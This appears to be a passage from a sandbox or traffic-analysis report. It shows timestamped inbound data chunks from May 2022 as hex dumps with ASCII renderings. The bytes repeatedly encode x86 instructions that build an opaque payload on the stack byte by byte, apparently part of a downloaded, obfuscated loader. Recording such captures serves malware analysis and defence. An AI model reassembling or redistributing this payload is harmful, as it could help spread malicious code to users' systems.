2022-05-16 08:29:53 UTC	4029	IN	Data Raw: ff fa c6 85 d6 ee fb ff 6f c6 85 d7 ee fb ff 1c c6 85 d8 ee fb ff e5 c6 85 d9 ee fb ff ab c6 85 da ee fb ff 4f c6 85 db ee fb ff 5a c6 85 dc ee fb ff ed c6 85 dd ee fb ff 9b c6 85 de ee fb ff cf c6 85 df ee fb ff b3 c6 85 e0 ee fb ff de c6 85 e1 ee fb ff 98 c6 85 e2 ee fb ff 32 c6 85 e3 ee fb ff ac c6 85 e4 ee fb ff ec c6 85 e5 ee fb ff dd c6 85 e6 ee fb ff 6f c6 85 e7 ee fb ff 4c c6 85 e8 ee fb ff 29 c6 85 e9 ee fb ff 84 c6 85 ea ee fb ff 0a c6 85 eb ee fb ff e3 c6 85 ec ee fb ff 7a c6 85 ed ee fb ff 85 c6 85 ee ee fb ff cd c6 85 ef ee fb ff de c6 85 f0 ee fb ff 6f c6 85 f1 ee fb ff 67 c6 85 f2 ee fb ff 31 c6 85 f3 ee fb ff 17 c6 85 f4 ee fb ff 1d c6 85 f5 ee fb ff c2 c6 85 f6 ee fb ff 60 c6 85 f7 ee fb ff 41 c6 85 f8 ee fb ff b4 c6 85 f9 ee fb ff c4 c6 Data Ascii: oOZ2oL)zog1`A
2022-05-16 08:29:53 UTC	4045	IN	Data Raw: fa f7 fb ff f3 c6 85 fb f7 fb ff 39 c6 85 fc f7 fb ff f4 c6 85 fd f7 fb ff 27 c6 85 fe f7 fb ff ae c6 85 ff f7 fb ff 18 c6 85 00 f8 fb ff 65 c6 85 01 f8 fb ff 54 c6 85 02 f8 fb ff 63 c6 85 03 f8 fb ff 1b c6 85 04 f8 fb ff 39 c6 85 05 f8 fb ff 61 c6 85 06 f8 fb ff 2d c6 85 07 f8 fb ff 28 c6 85 08 f8 fb ff b8 c6 85 09 f8 fb ff 2c c6 85 0a f8 fb ff ff c6 85 0b f8 fb ff f6 c6 85 0c f8 fb ff 3a c6 85 0d f8 fb ff eb c6 85 0e f8 fb ff 54 c6 85 0f f8 fb ff b5 c6 85 10 f8 fb ff 54 c6 85 11 f8 fb ff 20 c6 85 12 f8 fb ff 4b c6 85 13 f8 fb ff 3e c6 85 14 f8 fb ff f6 c6 85 15 f8 fb ff 22 c6 85 16 f8 fb ff f2 c6 85 17 f8 fb ff 3a c6 85 18 f8 fb ff 2b c6 85 19 f8 fb ff b9 c6 85 1a f8 fb ff 71 c6 85 1b f8 fb ff b7 c6 85 1c f8 fb ff b9 c6 85 1d f8 fb ff eb c6 85 1e f8 fb Data Ascii: 9'eTc9a-(,:TT K>":+q
2022-05-16 08:29:53 UTC	4061	IN	Data Raw: 09 c6 85 1f 01 fc ff 75 c6 85 20 01 fc ff f4 c6 85 21 01 fc ff f5 c6 85 22 01 fc ff 19 c6 85 23 01 fc ff 13 c6 85 24 01 fc ff 6b c6 85 25 01 fc ff 7f c6 85 26 01 fc ff d7 c6 85 27 01 fc ff 65 c6 85 28 01 fc ff 27 c6 85 29 01 fc ff db c6 85 2a 01 fc ff fe c6 85 2b 01 fc ff e2 c6 85 2c 01 fc ff 14 c6 85 2d 01 fc ff 13 c6 85 2e 01 fc ff 7d c6 85 2f 01 fc ff 3e c6 85 30 01 fc ff 8b c6 85 31 01 fc ff a3 c6 85 32 01 fc ff fa c6 85 33 01 fc ff d7 c6 85 34 01 fc ff 2a c6 85 35 01 fc ff 82 c6 85 36 01 fc ff e3 c6 85 37 01 fc ff b4 c6 85 38 01 fc ff bb c6 85 39 01 fc ff 2e c6 85 3a 01 fc ff cb c6 85 3b 01 fc ff f6 c6 85 3c 01 fc ff 36 c6 85 3d 01 fc ff ef c6 85 3e 01 fc ff 01 c6 85 3f 01 fc ff 8d c6 85 40 01 fc ff eb c6 85 41 01 fc ff 1b c6 85 42 01 fc ff 58 c6 85 Data Ascii: u !"#$k%&'e(')+,-.}/>0123456789.:;<6=>?@ABX
2022-05-16 08:29:53 UTC	4077	IN	Data Raw: 0a fc ff 0d c6 85 44 0a fc ff 05 c6 85 45 0a fc ff 1c c6 85 46 0a fc ff 13 c6 85 47 0a fc ff 06 c6 85 48 0a fc ff 52 c6 85 49 0a fc ff 35 c6 85 4a 0a fc ff 96 c6 85 4b 0a fc ff 3e c6 85 4c 0a fc ff fe c6 85 4d 0a fc ff e8 c6 85 4e 0a fc ff c1 c6 85 4f 0a fc ff 32 c6 85 50 0a fc ff 1c c6 85 51 0a fc ff 29 c6 85 52 0a fc ff 59 c6 85 53 0a fc ff d8 c6 85 54 0a fc ff 75 c6 85 55 0a fc ff a0 c6 85 56 0a fc ff 23 c6 85 57 0a fc ff 70 c6 85 58 0a fc ff 31 c6 85 59 0a fc ff 1c c6 85 5a 0a fc ff 24 c6 85 5b 0a fc ff 78 c6 85 5c 0a fc ff b6 c6 85 5d 0a fc ff 46 c6 85 5e 0a fc ff 2a c6 85 5f 0a fc ff ce c6 85 60 0a fc ff 6b c6 85 61 0a fc ff eb c6 85 62 0a fc ff 9f c6 85 63 0a fc ff 8f c6 85 64 0a fc ff 41 c6 85 65 0a fc ff 0b c6 85 66 0a fc ff 2f c6 85 67 0a fc ff Data Ascii: DEFGHRI5JK>LMNO2PQ)RYSTuUV#WpX1YZ$[x\]F^*_`kabcdAef/g
2022-05-16 08:29:53 UTC	4093	IN	Data Raw: c6 85 68 13 fc ff f7 c6 85 69 13 fc ff e8 c6 85 6a 13 fc ff 34 c6 85 6b 13 fc ff 0a c6 85 6c 13 fc ff 63 c6 85 6d 13 fc ff bc c6 85 6e 13 fc ff 8e c6 85 6f 13 fc ff 30 c6 85 70 13 fc ff 66 c6 85 71 13 fc ff ef c6 85 72 13 fc ff cd c6 85 73 13 fc ff be c6 85 74 13 fc ff f6 c6 85 75 13 fc ff 90 c6 85 76 13 fc ff 1e c6 85 77 13 fc ff 1b c6 85 78 13 fc ff d9 c6 85 79 13 fc ff df c6 85 7a 13 fc ff 3d c6 85 7b 13 fc ff c3 c6 85 7c 13 fc ff a5 c6 85 7d 13 fc ff d3 c6 85 7e 13 fc ff b9 c6 85 7f 13 fc ff 42 c6 85 80 13 fc ff 65 c6 85 81 13 fc ff 0c c6 85 82 13 fc ff de c6 85 83 13 fc ff d1 c6 85 84 13 fc ff 91 c6 85 85 13 fc ff cf c6 85 86 13 fc ff ce c6 85 87 13 fc ff 61 c6 85 88 13 fc ff 79 c6 85 89 13 fc ff c1 c6 85 8a 13 fc ff 4c c6 85 8b 13 fc ff d5 c6 85 8c Data Ascii: hij4klcmno0pfqrstuvwxyz={\|}~BeayL
2022-05-16 08:29:53 UTC	4109	IN	Data Raw: fc ff b6 c6 85 8d 1c fc ff 5a c6 85 8e 1c fc ff 8f c6 85 8f 1c fc ff b8 c6 85 90 1c fc ff 35 c6 85 91 1c fc ff 7d c6 85 92 1c fc ff 3a c6 85 93 1c fc ff 87 c6 85 94 1c fc ff 04 c6 85 95 1c fc ff 20 c6 85 96 1c fc ff fb c6 85 97 1c fc ff 78 c6 85 98 1c fc ff f4 c6 85 99 1c fc ff 53 c6 85 9a 1c fc ff d0 c6 85 9b 1c fc ff c2 c6 85 9c 1c fc ff ab c6 85 9d 1c fc ff d5 c6 85 9e 1c fc ff b3 c6 85 9f 1c fc ff a8 c6 85 a0 1c fc ff a9 c6 85 a1 1c fc ff 88 c6 85 a2 1c fc ff 75 c6 85 a3 1c fc ff c3 c6 85 a4 1c fc ff 15 c6 85 a5 1c fc ff 76 c6 85 a6 1c fc ff 59 c6 85 a7 1c fc ff f5 c6 85 a8 1c fc ff 72 c6 85 a9 1c fc ff 8a c6 85 aa 1c fc ff 39 c6 85 ab 1c fc ff 2a c6 85 ac 1c fc ff 45 c6 85 ad 1c fc ff 60 c6 85 ae 1c fc ff 51 c6 85 af 1c fc ff 5c c6 85 b0 1c fc ff c9 Data Ascii: Z5}: xSuvYr9*E`Q\
2022-05-16 08:29:53 UTC	4125	IN	Data Raw: 85 b1 25 fc ff 25 c6 85 b2 25 fc ff d2 c6 85 b3 25 fc ff 48 c6 85 b4 25 fc ff 23 c6 85 b5 25 fc ff 36 c6 85 b6 25 fc ff bb c6 85 b7 25 fc ff 7d c6 85 b8 25 fc ff a1 c6 85 b9 25 fc ff 80 c6 85 ba 25 fc ff fb c6 85 bb 25 fc ff 9e c6 85 bc 25 fc ff 00 c6 85 bd 25 fc ff e8 c6 85 be 25 fc ff 24 c6 85 bf 25 fc ff c6 c6 85 c0 25 fc ff 6f c6 85 c1 25 fc ff 5a c6 85 c2 25 fc ff 93 c6 85 c3 25 fc ff be c6 85 c4 25 fc ff 1b c6 85 c5 25 fc ff 29 c6 85 c6 25 fc ff f7 c6 85 c7 25 fc ff e0 c6 85 c8 25 fc ff a2 c6 85 c9 25 fc ff e4 c6 85 ca 25 fc ff 6b c6 85 cb 25 fc ff 6b c6 85 cc 25 fc ff f5 c6 85 cd 25 fc ff f8 c6 85 ce 25 fc ff 96 c6 85 cf 25 fc ff 02 c6 85 d0 25 fc ff 3a c6 85 d1 25 fc ff 02 c6 85 d2 25 fc ff 24 c6 85 d3 25 fc ff 7e c6 85 d4 25 fc ff 0d c6 85 d5 25 Data Ascii: %%%%H%#%6%%}%%%%%%%$%%o%Z%%%%)%%%%%k%k%%%%%:%%$%~%%
2022-05-16 08:29:53 UTC	4141	IN	Data Raw: ff 81 c6 85 d6 2e fc ff 17 c6 85 d7 2e fc ff f7 c6 85 d8 2e fc ff dd c6 85 d9 2e fc ff c3 c6 85 da 2e fc ff b6 c6 85 db 2e fc ff c7 c6 85 dc 2e fc ff e9 c6 85 dd 2e fc ff 53 c6 85 de 2e fc ff cc c6 85 df 2e fc ff 99 c6 85 e0 2e fc ff 7d c6 85 e1 2e fc ff 36 c6 85 e2 2e fc ff b9 c6 85 e3 2e fc ff 82 c6 85 e4 2e fc ff aa c6 85 e5 2e fc ff 4e c6 85 e6 2e fc ff 2b c6 85 e7 2e fc ff 68 c6 85 e8 2e fc ff af c6 85 e9 2e fc ff a4 c6 85 ea 2e fc ff c1 c6 85 eb 2e fc ff ba c6 85 ec 2e fc ff 58 c6 85 ed 2e fc ff 06 c6 85 ee 2e fc ff 06 c6 85 ef 2e fc ff 52 c6 85 f0 2e fc ff d7 c6 85 f1 2e fc ff 02 c6 85 f2 2e fc ff 36 c6 85 f3 2e fc ff 8b c6 85 f4 2e fc ff 60 c6 85 f5 2e fc ff 45 c6 85 f6 2e fc ff f5 c6 85 f7 2e fc ff 4f c6 85 f8 2e fc ff a6 c6 85 f9 2e fc ff 20 c6 Data Ascii: ........S...}.6....N.+.h.....X...R...6..`.E..O..
2022-05-16 08:29:53 UTC	4157	IN	Data Raw: fa 37 fc ff 20 c6 85 fb 37 fc ff a4 c6 85 fc 37 fc ff af c6 85 fd 37 fc ff 1a c6 85 fe 37 fc ff 23 c6 85 ff 37 fc ff 0b c6 85 00 38 fc ff e2 c6 85 01 38 fc ff 37 c6 85 02 38 fc ff d3 c6 85 03 38 fc ff d8 c6 85 04 38 fc ff 23 c6 85 05 38 fc ff c0 c6 85 06 38 fc ff e2 c6 85 07 38 fc ff 6b c6 85 08 38 fc ff de c6 85 09 38 fc ff 03 c6 85 0a 38 fc ff 69 c6 85 0b 38 fc ff 6d c6 85 0c 38 fc ff cd c6 85 0d 38 fc ff 81 c6 85 0e 38 fc ff 7b c6 85 0f 38 fc ff 85 c6 85 10 38 fc ff 74 c6 85 11 38 fc ff e9 c6 85 12 38 fc ff 6a c6 85 13 38 fc ff 67 c6 85 14 38 fc ff b3 c6 85 15 38 fc ff 48 c6 85 16 38 fc ff ce c6 85 17 38 fc ff 8a c6 85 18 38 fc ff 5f c6 85 19 38 fc ff a1 c6 85 1a 38 fc ff 91 c6 85 1b 38 fc ff ac c6 85 1c 38 fc ff b6 c6 85 1d 38 fc ff cb c6 85 1e 38 fc Data Ascii: 7 7777#7887888#888k888i8m888{88t88j8g88H888_888888
2022-05-16 08:29:53 UTC	4173	IN	Data Raw: 70 c6 85 1f 41 fc ff a3 c6 85 20 41 fc ff 6f c6 85 21 41 fc ff 15 c6 85 22 41 fc ff 0d c6 85 23 41 fc ff 78 c6 85 24 41 fc ff 6f c6 85 25 41 fc ff 53 c6 85 26 41 fc ff ba c6 85 27 41 fc ff c5 c6 85 28 41 fc ff 88 c6 85 29 41 fc ff f4 c6 85 2a 41 fc ff 17 c6 85 2b 41 fc ff 18 c6 85 2c 41 fc ff d1 c6 85 2d 41 fc ff c6 c6 85 2e 41 fc ff d2 c6 85 2f 41 fc ff 1e c6 85 30 41 fc ff c6 c6 85 31 41 fc ff 39 c6 85 32 41 fc ff 70 c6 85 33 41 fc ff 60 c6 85 34 41 fc ff c4 c6 85 35 41 fc ff 7a c6 85 36 41 fc ff d2 c6 85 37 41 fc ff fa c6 85 38 41 fc ff 1c c6 85 39 41 fc ff 0e c6 85 3a 41 fc ff ef c6 85 3b 41 fc ff 91 c6 85 3c 41 fc ff fa c6 85 3d 41 fc ff f0 c6 85 3e 41 fc ff bd c6 85 3f 41 fc ff cf c6 85 40 41 fc ff d4 c6 85 41 41 fc ff 0c c6 85 42 41 fc ff 86 c6 85 Data Ascii: pA Ao!A"A#Ax$Ao%AS&A'A(A)A*A+A,A-A.A/A0A1A92Ap3A`4A5Az6A7A8A9A:A;A<A=A>A?A@AAABA
2022-05-16 08:29:53 UTC	4189	IN	Data Raw: 4a fc ff 81 c6 85 44 4a fc ff 3d c6 85 45 4a fc ff 03 c6 85 46 4a fc ff 23 c6 85 47 4a fc ff be c6 85 48 4a fc ff 10 c6 85 49 4a fc ff 0d c6 85 4a 4a fc ff 0b c6 85 4b 4a fc ff a3 c6 85 4c 4a fc ff 95 c6 85 4d 4a fc ff dd c6 85 4e 4a fc ff bc c6 85 4f 4a fc ff 59 c6 85 50 4a fc ff 1e c6 85 51 4a fc ff 32 c6 85 52 4a fc ff 24 c6 85 53 4a fc ff df c6 85 54 4a fc ff 96 c6 85 55 4a fc ff 6c c6 85 56 4a fc ff b2 c6 85 57 4a fc ff 49 c6 85 58 4a fc ff ac c6 85 59 4a fc ff d0 c6 85 5a 4a fc ff 5c c6 85 5b 4a fc ff d2 c6 85 5c 4a fc ff ef c6 85 5d 4a fc ff eb c6 85 5e 4a fc ff a4 c6 85 5f 4a fc ff dc c6 85 60 4a fc ff 77 c6 85 61 4a fc ff 91 c6 85 62 4a fc ff 4c c6 85 63 4a fc ff cf c6 85 64 4a fc ff 38 c6 85 65 4a fc ff 70 c6 85 66 4a fc ff 52 c6 85 67 4a fc ff Data Ascii: JDJ=EJFJ#GJHJIJJJKJLJMJNJOJYPJQJ2RJ$SJTJUJlVJWJIXJYJZJ\[J\J]J^J_J`JwaJbJLcJdJ8eJpfJRgJ
2022-05-16 08:29:53 UTC	4205	IN	Data Raw: c6 85 68 53 fc ff 9b c6 85 69 53 fc ff ee c6 85 6a 53 fc ff be c6 85 6b 53 fc ff 8f c6 85 6c 53 fc ff 5d c6 85 6d 53 fc ff ba c6 85 6e 53 fc ff b9 c6 85 6f 53 fc ff 60 c6 85 70 53 fc ff 29 c6 85 71 53 fc ff d6 c6 85 72 53 fc ff 7f c6 85 73 53 fc ff 4a c6 85 74 53 fc ff 4e c6 85 75 53 fc ff 1a c6 85 76 53 fc ff 75 c6 85 77 53 fc ff a2 c6 85 78 53 fc ff 2b c6 85 79 53 fc ff 70 c6 85 7a 53 fc ff 19 c6 85 7b 53 fc ff ed c6 85 7c 53 fc ff a5 c6 85 7d 53 fc ff 94 c6 85 7e 53 fc ff 8e c6 85 7f 53 fc ff 0e c6 85 80 53 fc ff e9 c6 85 81 53 fc ff 7d c6 85 82 53 fc ff be c6 85 83 53 fc ff e3 c6 85 84 53 fc ff 1b c6 85 85 53 fc ff 75 c6 85 86 53 fc ff 29 c6 85 87 53 fc ff 0f c6 85 88 53 fc ff 2f c6 85 89 53 fc ff 2f c6 85 8a 53 fc ff 64 c6 85 8b 53 fc ff d6 c6 85 8c Data Ascii: hSiSjSkSlS]mSnSoS`pS)qSrSsSJtSNuSvSuwSxS+ySpzS{S\|S}S~SSSS}SSSSuS)SS/S/SdS
2022-05-16 08:29:53 UTC	4221	IN	Data Raw: fc ff 9b c6 85 8d 5c fc ff 7e c6 85 8e 5c fc ff 0f c6 85 8f 5c fc ff 69 c6 85 90 5c fc ff d3 c6 85 91 5c fc ff 02 c6 85 92 5c fc ff db c6 85 93 5c fc ff c9 c6 85 94 5c fc ff fd c6 85 95 5c fc ff be c6 85 96 5c fc ff f0 c6 85 97 5c fc ff 90 c6 85 98 5c fc ff 1e c6 85 99 5c fc ff 1b c6 85 9a 5c fc ff d9 c6 85 9b 5c fc ff 7d c6 85 9c 5c fc ff 2e c6 85 9d 5c fc ff c2 c6 85 9e 5c fc ff a5 c6 85 9f 5c fc ff d3 c6 85 a0 5c fc ff b9 c6 85 a1 5c fc ff 5a c6 85 a2 5c fc ff 65 c6 85 a3 5c fc ff 04 c6 85 a4 5c fc ff 7e c6 85 a5 5c fc ff e3 c6 85 a6 5c fc ff b9 c6 85 a7 5c fc ff eb c6 85 a8 5c fc ff ee c6 85 a9 5c fc ff c1 c6 85 aa 5c fc ff b0 c6 85 ab 5c fc ff 85 c6 85 ac 5c fc ff 68 c6 85 ad 5c fc ff 85 c6 85 ae 5c fc ff d0 c6 85 af 5c fc ff bf c6 85 b0 5c fc ff 75 Data Ascii: \~\\i\\\\\\\\\\\\}\.\\\\\Z\e\\~\\\\\\\\h\\\\u
2022-05-16 08:29:53 UTC	4237	IN	Data Raw: 85 b1 65 fc ff d4 c6 85 b2 65 fc ff 59 c6 85 b3 65 fc ff 96 c6 85 b4 65 fc ff 3e c6 85 b5 65 fc ff 2a c6 85 b6 65 fc ff 68 c6 85 b7 65 fc ff 4c c6 85 b8 65 fc ff 50 c6 85 b9 65 fc ff 39 c6 85 ba 65 fc ff 37 c6 85 bb 65 fc ff 9c c6 85 bc 65 fc ff b4 c6 85 bd 65 fc ff ea c6 85 be 65 fc ff ab c6 85 bf 65 fc ff 75 c6 85 c0 65 fc ff 32 c6 85 c1 65 fc ff e8 c6 85 c2 65 fc ff 67 c6 85 c3 65 fc ff ce c6 85 c4 65 fc ff 31 c6 85 c5 65 fc ff 93 c6 85 c6 65 fc ff 19 c6 85 c7 65 fc ff f2 c6 85 c8 65 fc ff 72 c6 85 c9 65 fc ff 30 c6 85 ca 65 fc ff 95 c6 85 cb 65 fc ff 00 c6 85 cc 65 fc ff 7d c6 85 cd 65 fc ff 0e c6 85 ce 65 fc ff 25 c6 85 cf 65 fc ff a3 c6 85 d0 65 fc ff 96 c6 85 d1 65 fc ff b8 c6 85 d2 65 fc ff e1 c6 85 d3 65 fc ff 46 c6 85 d4 65 fc ff 57 c6 85 d5 65 Data Ascii: eeYee>e*eheLePe9e7eeeeeue2eegee1eeeere0eee}ee%eeeeeFeWe
2022-05-16 08:29:53 UTC	4253	IN	Data Raw: ff 48 c6 85 d6 6e fc ff 43 c6 85 d7 6e fc ff 32 c6 85 d8 6e fc ff b1 c6 85 d9 6e fc ff f9 c6 85 da 6e fc ff 8d c6 85 db 6e fc ff d0 c6 85 dc 6e fc ff ff c6 85 dd 6e fc ff 9e c6 85 de 6e fc ff 00 c6 85 df 6e fc ff d8 c6 85 e0 6e fc ff 24 c6 85 e1 6e fc ff c4 c6 85 e2 6e fc ff eb c6 85 e3 6e fc ff 96 c6 85 e4 6e fc ff b3 c6 85 e5 6e fc ff ea c6 85 e6 6e fc ff 67 c6 85 e7 6e fc ff 3a c6 85 e8 6e fc ff 97 c6 85 e9 6e fc ff 2f c6 85 ea 6e fc ff ed c6 85 eb 6e fc ff 98 c6 85 ec 6e fc ff 8c c6 85 ed 6e fc ff ef c6 85 ee 6e fc ff b2 c6 85 ef 6e fc ff 60 c6 85 f0 6e fc ff fa c6 85 f1 6e fc ff b3 c6 85 f2 6e fc ff 3e c6 85 f3 6e fc ff ad c6 85 f4 6e fc ff 60 c6 85 f5 6e fc ff 12 c6 85 f6 6e fc ff b6 c6 85 f7 6e fc ff 6d c6 85 f8 6e fc ff 1a c6 85 f9 6e fc ff 2f c6 Data Ascii: HnCn2nnnnnnnnn$nnnnnngn:nn/nnnnnn`nnn>nn`nnnmnn/
2022-05-16 08:29:53 UTC	4269	IN	Data Raw: fa 77 fc ff f5 c6 85 fb 77 fc ff 8b c6 85 fc 77 fc ff 3d c6 85 fd 77 fc ff 8b c6 85 fe 77 fc ff 85 c6 85 ff 77 fc ff e8 c6 85 00 78 fc ff 60 c6 85 01 78 fc ff 70 c6 85 02 78 fc ff 6a c6 85 03 78 fc ff 7e c6 85 04 78 fc ff 7e c6 85 05 78 fc ff 8a c6 85 06 78 fc ff 31 c6 85 07 78 fc ff 85 c6 85 08 78 fc ff 03 c6 85 09 78 fc ff ab c6 85 0a 78 fc ff 63 c6 85 0b 78 fc ff ae c6 85 0c 78 fc ff 49 c6 85 0d 78 fc ff 52 c6 85 0e 78 fc ff b4 c6 85 0f 78 fc ff ca c6 85 10 78 fc ff 72 c6 85 11 78 fc ff 9f c6 85 12 78 fc ff 9f c6 85 13 78 fc ff 8b c6 85 14 78 fc ff 7a c6 85 15 78 fc ff e7 c6 85 16 78 fc ff 03 c6 85 17 78 fc ff cd c6 85 18 78 fc ff 76 c6 85 19 78 fc ff eb c6 85 1a 78 fc ff 05 c6 85 1b 78 fc ff 24 c6 85 1c 78 fc ff 0d c6 85 1d 78 fc ff 99 c6 85 1e 78 fc Data Ascii: www=wwwx`xpxjx~x~xx1xxxxcxxIxRxxxrxxxxzxxxxvxxx$xxx
2022-05-16 08:29:53 UTC	4285	IN	Data Raw: a7 c6 85 1f 81 fc ff be c6 85 20 81 fc ff a8 c6 85 21 81 fc ff 12 c6 85 22 81 fc ff 83 c6 85 23 81 fc ff 7f c6 85 24 81 fc ff da c6 85 25 81 fc ff 90 c6 85 26 81 fc ff b1 c6 85 27 81 fc ff 40 c6 85 28 81 fc ff fb c6 85 29 81 fc ff 23 c6 85 2a 81 fc ff a0 c6 85 2b 81 fc ff 2c c6 85 2c 81 fc ff 4c c6 85 2d 81 fc ff 4d c6 85 2e 81 fc ff b1 c6 85 2f 81 fc ff 64 c6 85 30 81 fc ff 7e c6 85 31 81 fc ff a1 c6 85 32 81 fc ff 9c c6 85 33 81 fc ff 95 c6 85 34 81 fc ff 6b c6 85 35 81 fc ff 67 c6 85 36 81 fc ff 31 c6 85 37 81 fc ff 6c c6 85 38 81 fc ff a4 c6 85 39 81 fc ff 4a c6 85 3a 81 fc ff 12 c6 85 3b 81 fc ff 85 c6 85 3c 81 fc ff 1b c6 85 3d 81 fc ff a0 c6 85 3e 81 fc ff 70 c6 85 3f 81 fc ff ef c6 85 40 81 fc ff 64 c6 85 41 81 fc ff 70 c6 85 42 81 fc ff 2c c6 85 Data Ascii: !"#$%&'@()#*+,,L-M./d0~1234k5g617l89J:;<=>p?@dApB,
2022-05-16 08:29:53 UTC	4301	IN	Data Raw: 8a fc ff d9 c6 85 44 8a fc ff 41 c6 85 45 8a fc ff 99 c6 85 46 8a fc ff 99 c6 85 47 8a fc ff 74 c6 85 48 8a fc ff 7c c6 85 49 8a fc ff 29 c6 85 4a 8a fc ff 65 c6 85 4b 8a fc ff 41 c6 85 4c 8a fc ff 73 c6 85 4d 8a fc ff 11 c6 85 4e 8a fc ff d5 c6 85 4f 8a fc ff 33 c6 85 50 8a fc ff c4 c6 85 51 8a fc ff dc c6 85 52 8a fc ff 9a c6 85 53 8a fc ff 79 c6 85 54 8a fc ff 38 c6 85 55 8a fc ff a3 c6 85 56 8a fc ff cb c6 85 57 8a fc ff 1a c6 85 58 8a fc ff d6 c6 85 59 8a fc ff c8 c6 85 5a 8a fc ff 54 c6 85 5b 8a fc ff 8d c6 85 5c 8a fc ff ee c6 85 5d 8a fc ff 47 c6 85 5e 8a fc ff 56 c6 85 5f 8a fc ff 79 c6 85 60 8a fc ff 31 c6 85 61 8a fc ff c6 c6 85 62 8a fc ff 62 c6 85 63 8a fc ff fa c6 85 64 8a fc ff ca c6 85 65 8a fc ff d0 c6 85 66 8a fc ff 58 c6 85 67 8a fc ff Data Ascii: DAEFGtH\|I)JeKALsMNO3PQRSyT8UVWXYZT[\]G^V_y`1abbcdefXg
2022-05-16 08:29:53 UTC	4317	IN	Data Raw: c6 85 68 93 fc ff e6 c6 85 69 93 fc ff 0b c6 85 6a 93 fc ff 74 c6 85 6b 93 fc ff c4 c6 85 6c 93 fc ff 4f c6 85 6d 93 fc ff 90 c6 85 6e 93 fc ff 7d c6 85 6f 93 fc ff 0e c6 85 70 93 fc ff f9 c6 85 71 93 fc ff a5 c6 85 72 93 fc ff 61 c6 85 73 93 fc ff ff c6 85 74 93 fc ff 2f c6 85 75 93 fc ff 98 c6 85 76 93 fc ff b2 c6 85 77 93 fc ff 5c c6 85 78 93 fc ff b2 c6 85 79 93 fc ff 41 c6 85 7a 93 fc ff ec c6 85 7b 93 fc ff dc c6 85 7c 93 fc ff 5f c6 85 7d 93 fc ff 1a c6 85 7e 93 fc ff 23 c6 85 7f 93 fc ff 27 c6 85 80 93 fc ff 20 c6 85 81 93 fc ff 15 c6 85 82 93 fc ff fe c6 85 83 93 fc ff c4 c6 85 84 93 fc ff 68 c6 85 85 93 fc ff df c6 85 86 93 fc ff b5 c6 85 87 93 fc ff 07 c6 85 88 93 fc ff 71 c6 85 89 93 fc ff ea c6 85 8a 93 fc ff fe c6 85 8b 93 fc ff 27 c6 85 8c Data Ascii: hijtklOmn}opqrast/uvw\xyAz{\|_}~#' hq'
2022-05-16 08:29:53 UTC	4333	IN	Data Raw: fc ff 61 c6 85 8d 9c fc ff b1 c6 85 8e 9c fc ff d7 c6 85 8f 9c fc ff be c6 85 90 9c fc ff 16 c6 85 91 9c fc ff 04 c6 85 92 9c fc ff e5 c6 85 93 9c fc ff 57 c6 85 94 9c fc ff ee c6 85 95 9c fc ff 7d c6 85 96 9c fc ff 7d c6 85 97 9c fc ff 80 c6 85 98 9c fc ff b0 c6 85 99 9c fc ff 6d c6 85 9a 9c fc ff 4b c6 85 9b 9c fc ff 74 c6 85 9c 9c fc ff 71 c6 85 9d 9c fc ff df c6 85 9e 9c fc ff db c6 85 9f 9c fc ff b0 c6 85 a0 9c fc ff f6 c6 85 a1 9c fc ff 46 c6 85 a2 9c fc ff 2a c6 85 a3 9c fc ff 7a c6 85 a4 9c fc ff f6 c6 85 a5 9c fc ff 8b c6 85 a6 9c fc ff 90 c6 85 a7 9c fc ff 39 c6 85 a8 9c fc ff 0d c6 85 a9 9c fc ff dc c6 85 aa 9c fc ff c3 c6 85 ab 9c fc ff 64 c6 85 ac 9c fc ff 27 c6 85 ad 9c fc ff da c6 85 ae 9c fc ff 0c c6 85 af 9c fc ff 80 c6 85 b0 9c fc ff 6b Data Ascii: aW}}mKtqF*z9d'k
2022-05-16 08:29:53 UTC	4349	IN	Data Raw: 85 b1 a5 fc ff 31 c6 85 b2 a5 fc ff d3 c6 85 b3 a5 fc ff 06 c6 85 b4 a5 fc ff d3 c6 85 b5 a5 fc ff c9 c6 85 b6 a5 fc ff bd c6 85 b7 a5 fc ff be c6 85 b8 a5 fc ff f6 c6 85 b9 a5 fc ff 24 c6 85 ba a5 fc ff 72 c6 85 bb a5 fc ff a0 c6 85 bc a5 fc ff c0 c6 85 bd a5 fc ff 15 c6 85 be a5 fc ff df c6 85 bf a5 fc ff 3d c6 85 c0 a5 fc ff 5a c6 85 c1 a5 fc ff 9b c6 85 c2 a5 fc ff c1 c6 85 c3 a5 fc ff aa c6 85 c4 a5 fc ff 09 c6 85 c5 a5 fc ff d1 c6 85 c6 a5 fc ff b2 c6 85 c7 a5 fc ff 4c c6 85 c8 a5 fc ff 45 c6 85 c9 a5 fc ff cf c6 85 ca a5 fc ff ce c6 85 cb a5 fc ff 29 c6 85 cc a5 fc ff ba c6 85 cd a5 fc ff 08 c6 85 ce a5 fc ff e4 c6 85 cf a5 fc ff a1 c6 85 d0 a5 fc ff 18 c6 85 d1 a5 fc ff 36 c6 85 d2 a5 fc ff 31 c6 85 d3 a5 fc ff 7d c6 85 d4 a5 fc ff 74 c6 85 d5 a5 Data Ascii: 1$r=ZLE)61}t
2022-05-16 08:29:53 UTC	4365	IN	Data Raw: ff be c6 85 d6 ae fc ff f5 c6 85 d7 ae fc ff 67 c6 85 d8 ae fc ff 14 c6 85 d9 ae fc ff ab c6 85 da ae fc ff bc c6 85 db ae fc ff bd c6 85 dc ae fc ff 70 c6 85 dd ae fc ff 14 c6 85 de ae fc ff 5c c6 85 df ae fc ff 06 c6 85 e0 ae fc ff ab c6 85 e1 ae fc ff 77 c6 85 e2 ae fc ff 3e c6 85 e3 ae fc ff c4 c6 85 e4 ae fc ff 60 c6 85 e5 ae fc ff 38 c6 85 e6 ae fc ff fa c6 85 e7 ae fc ff cf c6 85 e8 ae fc ff b8 c6 85 e9 ae fc ff 3a c6 85 ea ae fc ff 35 c6 85 eb ae fc ff 3e c6 85 ec ae fc ff 7a c6 85 ed ae fc ff 71 c6 85 ee ae fc ff be c6 85 ef ae fc ff c2 c6 85 f0 ae fc ff 25 c6 85 f1 ae fc ff a1 c6 85 f2 ae fc ff 9e c6 85 f3 ae fc ff b8 c6 85 f4 ae fc ff c9 c6 85 f5 ae fc ff b6 c6 85 f6 ae fc ff 23 c6 85 f7 ae fc ff 72 c6 85 f8 ae fc ff 98 c6 85 f9 ae fc ff 46 c6 Data Ascii: gp\w>`8:5>zq%#rF
